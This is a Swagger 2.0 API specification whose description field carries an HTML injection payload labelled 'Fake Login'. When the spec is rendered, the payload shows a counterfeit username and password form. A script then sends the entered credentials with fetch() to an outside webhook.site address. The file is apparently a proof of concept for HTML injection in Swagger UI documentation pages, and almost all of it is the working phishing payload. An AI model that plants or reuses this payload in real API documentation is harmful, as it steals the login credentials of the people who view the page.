swagger: '2.0'
info:
  version: 1.0.0
  title: Fake Login Page
  description: |
    <div class="login-form">
      <div class="heading">
        <h1>HTML Injection : Fake Login</h1>
      </div>
      <div class="form-container">
        <form id="login-form" action="https://webhook.site/ede6de5f-5613-4213-9411-ace71b553bd3" method="post" class="form-signin">
          <div class="form-group">
            <label for="username">Username</label>
            <input type="text" name="username" size="20" id="username">
          </div>
          <div class="form-group">
            <label for="password">Password</label>
            <input type="password" name="password" size="20" id="password">
          </div>
          <div class="form-group">
            <button type="submit" class="btn btn-default">Login</button>
          </div>
        </form>
        <script>
          const form = document.getElementById('login-form');
          form.addEventListener('submit', (e) => {
            e.preventDefault();
            const username = document.getElementById('username').value;
            const password = document.getElementById('password').value;
            const formData = new FormData();
            formData.append('username', username);
            formData.append('password', password);
            fetch('https://webhook.site/ede6de5f-5613-4213-9411-ace71b553bd3', {
              method: 'POST',
              body: formData,
            });
          });
        </script>
      </div>
    </div>
paths:
  /:
    post:
      summary: Fake Login Endpoint
      description: This endpoint serves a fake login page
      responses:
        '200':
          description: Login successful
